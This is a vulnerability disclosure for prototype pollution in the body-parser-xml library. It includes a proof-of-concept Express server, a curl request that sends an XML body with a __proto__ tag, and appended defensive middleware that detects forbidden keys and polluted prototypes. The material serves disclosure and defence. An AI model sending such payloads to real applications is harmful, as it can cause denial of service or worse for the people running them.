Prototype Pollution in fiznool/body-parser-xml

Reported on May 18th 2021

✍️ Description

This library uses an XML parsing library that is susceptible to prototype pollution. However, the issue can be fixed on our side (in body-parser-xml itself).

🕵️‍♂️ Proof of Concept

const express = require('express');
const bodyParser = require('body-parser');
require('body-parser-xml')(bodyParser); // registers bodyParser.xml()

const app = express();
const port = 3001;

// Parse application/xml bodies into req.body
app.use(bodyParser.xml({
  xmlParseOptions: {
    normalize: true, // Trim whitespace inside text nodes
    normalizeTags: true, // Transform tags to lowercase
    explicitArray: false, // Only put nodes in array if >1
  }
}));

app.post("/", (req, res) => {
  return res.end("OK");
});

app.listen(port, () => {
  console.log(`Server at http://localhost:${port}`);
});

Then make a POST request:

curl -X POST http://localhost:3001/ -d "<__proto__><test>ok</test></__proto__>" -H "Content-Type: application/xml"

💥 Impact

This vulnerability can lead to remote code execution or denial of service, depending on how the application uses the parsed body.
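The report notes that the issue can be addressed on the library's side. As an added example (not code from the report, from body-parser-xml, or from its XML parser), the block below shows one defensive check an application can run between the body parser and its route handlers: it walks the parsed object tree over its own enumerable keys and rejects any key that can reach Object.prototype (`__proto__`, `constructor`, `prototype`), plus a small canary that reports whether Object.prototype has already been polluted. The Express-style `(req, res, next)` middleware shape, the 400 status code, and the sample inputs are assumptions of this example; the samples are constructed with JSON.parse because that creates an own property literally named `__proto__`, which is the shape a permissive parser hands back for `<__proto__>…</__proto__>`.

```javascript
// Added example, not part of the original report or of body-parser-xml.
// Runs stand-alone: no Express dependency, only the (req, res, next)
// middleware shape is assumed.

const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Depth-first walk over own enumerable keys of a parsed body.
// Returns the dotted path of the first forbidden key, or null if clean.
function findForbiddenKeyPath(value, path = []) {
  if (value === null || typeof value !== 'object') return null;
  if (Array.isArray(value)) {
    for (let i = 0; i < value.length; i++) {
      const hit = findForbiddenKeyPath(value[i], path.concat(String(i)));
      if (hit !== null) return hit;
    }
    return null;
  }
  // Object.keys lists own properties only: an own "__proto__" property
  // created by a parser is reported, the real prototype link is not walked.
  for (const key of Object.keys(value)) {
    if (FORBIDDEN_KEYS.has(key)) return path.concat(key).join('.');
    const hit = findForbiddenKeyPath(value[key], path.concat(key));
    if (hit !== null) return hit;
  }
  return null;
}

// Express-style middleware (assumed shape): mount after the body parser and
// before route handlers. The 400 status is a choice made for this example.
function rejectPrototypePollution(req, res, next) {
  const hit = findForbiddenKeyPath(req.body);
  if (hit !== null) {
    res.status(400).json({ error: 'forbidden key in request body', path: hit });
    return;
  }
  next();
}

// Canary: a fresh empty object should expose no enumerable keys through its
// prototype chain. Returns the names that have leaked into Object.prototype.
function leakedPrototypeKeys() {
  const leaked = [];
  for (const key in {}) leaked.push(key);
  return leaked;
}

// Constructed sample inputs (not from the report). JSON.parse creates an own
// property named "__proto__"; an object literal would set the prototype instead.
const SAMPLE_POLLUTING = JSON.parse('{"__proto__": {"test": "ok"}}');
const SAMPLE_NESTED = JSON.parse(
  '{"order": {"items": [{"constructor": {"prototype": {"x": 1}}}]}}'
);
const SAMPLE_CLEAN = JSON.parse('{"order": {"items": [{"sku": "A1", "qty": 2}]}}');

// Stand-alone demonstration.
console.log('polluting:', findForbiddenKeyPath(SAMPLE_POLLUTING)); // __proto__
console.log('nested:', findForbiddenKeyPath(SAMPLE_NESTED));       // order.items.0.constructor
console.log('clean:', findForbiddenKeyPath(SAMPLE_CLEAN));         // null
console.log('leaked into Object.prototype:', leakedPrototypeKeys()); // []
```

The walk uses `Object.keys`, so it inspects what the parser actually stored as own properties and never descends through a real prototype link; running the canary after parsing a request is a cheap way to detect that pollution has already happened in a process, since a polluted Object.prototype shows up as unexpected enumerable keys on every object.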